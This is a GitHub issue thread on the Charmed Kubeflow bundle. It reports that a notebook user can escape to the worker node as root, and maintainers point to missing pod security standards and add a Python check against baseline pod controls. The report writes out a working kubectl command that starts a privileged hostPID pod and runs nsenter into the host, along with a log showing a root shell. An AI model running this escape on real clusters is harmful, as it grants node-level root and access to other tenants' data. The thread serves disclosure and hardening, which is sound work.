canonical / bundle-kubeflow

Charmed Kubeflow
Apache License 2.0

Escape from notebook to node&user=root possible #700

Open iptizer opened 10 months ago

iptizer commented 10 months ago

Bug Description

While using the Canonical Kubeflow distribution, we discovered a major security incident.

It is possible to escape to the worker node with just one command. With this command, root privileges on the worker node are gained and may be used to hook into other users' pods or access data of other users.

To Reproduce

  1. Install Kubeflow
  2. Login as user
  3. Start a JupyterLab notebook
  4. Connect to the JupyterLab notebook and open a terminal
  5. Execute the following code
    kubectl run iamrootonthehost --restart=Never -it \
    --image overriden --overrides '
    {
    "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "tolerations": [
    { "effect": "NoSchedule", "key": "node-role.kubernetes.io/master" },
    { "effect": "NoSchedule", "key": "node-role.kubernetes.io/controlplane" },
    { "effect": "NoExecute", "key": "node-role.kubernetes.io/etcd" }
    ],
    "containers": [
    {
    "name": "alpine",
    "image": "alpine:3.7",
    "command": [
    "nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-"
    ],
    "stdin": true,
    "tty": true,
    "resources": {"requests": {"cpu": "10m"}},
    "securityContext": {
    "privileged": true
    }
    }
    ]
    }
    }'
  6. Shell as user root on node is granted.

Environment

Should not matter, but as follows:

Relevant Log Output

jovyan@jupyterlab-0:~$ 
jovyan@jupyterlab-0:~$ kubectl run iamrootonthehost --restart=Never -it \
> --image overriden --overrides '
> {
> "spec": {
> "hostPID": true,
> "hostNetwork": true,
> "tolerations": [
> { "effect": "NoSchedule", "key": "node-role.kubernetes.io/master" },
> { "effect": "NoSchedule", "key": "node-role.kubernetes.io/controlplane" },
> { "effect": "NoExecute", "key": "node-role.kubernetes.io/etcd" }
> ],
> "containers": [
> {
> "name": "alpine",
> "image": "alpine:3.7",
> "command": [
> "nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-"
> ],
> "stdin": true,
> "tty": true,
> "resources": {"requests": {"cpu": "10m"}},
> "securityContext": {
> "privileged": true
> }
> }
> ]
> }
> }'
If you don't see a command prompt, try pressing enter.
sh-4.2# 
sh-4.2# whoami
root
sh-4.2# hostname
ip-xx-xx-xx-xx.eu-central-1.compute.internal
sh-4.2#

Additional Context

No response

juliusvonkohout commented 10 months ago

This is just a crazy misconfiguration. Is your cluster missing pod security standards restricted for all namespaces?

kimwnasptd commented 10 months ago

@iptizer as @juliusvonkohout mentioned, the above happens because right now there is no component (i.e. kyverno, pod security standards) for restricting privileges across all namespaces.

We are actively looking into natively supporting this in Charmed Kubeflow and ensuring they are working as expected with the rest of the Juju ecosystem.
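
Added example, not part of the original thread and not code from Charmed Kubeflow: a Python check for a subset of the Pod Security Standards "baseline" controls (which "restricted" includes), run against the security-relevant fields of the `--overrides` spec from the report. The function name, the hardened sample pod and its image name are constructed for illustration.

```python
import json

# Security-relevant fields of the --overrides spec in the report above
# (tolerations, command and resources trimmed; they do not affect the result).
ISSUE_OVERRIDE = json.loads("""
{"spec": {"hostPID": true, "hostNetwork": true,
  "containers": [{"name": "alpine", "image": "alpine:3.7",
    "securityContext": {"privileged": true}}]}}
""")

# Constructed sample: a pod that requests no host-level access.
HARDENED_POD = {"spec": {"containers": [{
    "name": "notebook", "image": "example.invalid/notebook:1",
    "securityContext": {"privileged": False,
                        "allowPrivilegeEscalation": False}}]}}


def baseline_violations(pod):
    """Return the baseline controls a pod manifest breaks.

    Covers only host namespaces, privileged containers and hostPath
    volumes; the full standard has further controls (capabilities,
    host ports, and others) that this sketch does not evaluate.
    """
    spec = pod.get("spec", {})
    found = []
    # Host namespaces: each field must be unset or false.
    for field in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(field):
            found.append(f"spec.{field}=true")
    # Privileged mode is checked on every container list in the pod.
    for kind in ("containers", "initContainers", "ephemeralContainers"):
        for c in spec.get(kind, []):
            if (c.get("securityContext") or {}).get("privileged"):
                found.append(
                    f"spec.{kind}[{c.get('name')}].securityContext.privileged=true")
    # hostPath volumes expose the node filesystem directly.
    for v in spec.get("volumes", []):
        if "hostPath" in v:
            found.append(f"spec.volumes[{v.get('name')}].hostPath")
    return found


if __name__ == "__main__":
    for label, pod in (("issue override", ISSUE_OVERRIDE),
                       ("hardened sample", HARDENED_POD)):
        print(label, "->", baseline_violations(pod) or "no violations found")
```

In a cluster, the built-in Pod Security admission controller applies the full set of these checks to namespaces that carry the `pod-security.kubernetes.io/enforce` label.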

juliusvonkohout commented 10 months ago

@iptizer Here you can track the progress https://github.com/kubeflow/manifests/issues/2528 and here is the official proposal https://github.com/kubeflow/manifests/pull/2527